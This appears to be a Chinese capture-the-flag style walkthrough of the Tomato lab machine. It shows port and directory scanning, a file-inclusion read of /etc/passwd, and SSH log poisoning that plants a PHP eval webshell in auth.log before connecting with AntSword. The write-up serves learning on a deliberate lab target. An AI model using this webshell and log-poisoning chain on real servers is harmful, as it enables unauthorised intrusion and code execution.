当前位置: 首页 > article >正文

Tomato靶机

导入靶机

虚拟机设置里面选择NAT模式,并勾选设备状态下两个选项,设置好后重启靶机

在kali使用nmap对tomato进行信息收集

扫描开放的端口

目录扫描

使用dirb进行目录扫描:dirb http://192.168.247.137/

访问antibot_image目录
找到info.php
查看info.php的网页源码,发现存在文件包含漏洞

利用文件包含漏洞进行攻击

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

使用这个命令扫描全部端口

nmap -A 192.168.247.137 -p-

又发现了2211,ssh表示是远程链接

利用远程链接写木马攻击网站

ssh '<?php @eval($_POST[1]);?>'@192.168.247.137 -p 2211

这里很莫名其妙,kali的ssh就是无法连接一直显示remote username contains invalid characters

用其他方式链接就行

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。

无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

该目录下发现多了一些报错信息,大概率写入木马成功

使用中国蚁剑进行连接

上传了一句话木马的路径:http://192.168.247.137/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log

连接密码是刚刚POST传入的:1

成功拿到整个网站的目录信息

可以用虚拟终端执行命令


http://www.kler.cn/a/586748.html

相关文章:

  • Vue 中的 v-for 如何遍历对象?
  • 【模拟算法】
  • misc19~21
  • 如何在AVL树中高效插入并保持平衡:一步步掌握旋转与平衡因子 —— 旋转篇
  • ​​​​​​​大语言模型安全风险分析及相关解决方案
  • P3379 【模板】最近公共祖先(LCA)【题解】(倍增法)
  • 链表·简单归并
  • OpenBMC:BmcWeb添加路由3 设置权限
  • 机器学习 Day05 pandas库
  • Linux 系统蓝牙音频服务实现分析
  • 基于深度学习的蛀牙智能检测与语音提示系统【python源码+Pyqt5界面+数据集+训练代码】
  • C语言数据类型取值范围及格式化符号
  • CentOS 8 停止维护后通过 rpm 包手动安装 docker
  • 《P1540 [NOIP 2010 提高组] 机器翻译 题解》
  • Scala语言的数据库编程
  • 基于雪雁算法(Snow Geese Algorithm,SGA)的多个无人机协同路径规划(可以自定义无人机数量及起始点),MATLAB代码
  • MongoDB集合(表)自动创建机制
  • ffmpeg基础整理
  • 《AI浪潮中的璀璨新星:Meta Llama、Ollama与DeepSeek的深度剖析》:此文为AI自动生成
  • 利用matlab编制的转子动力学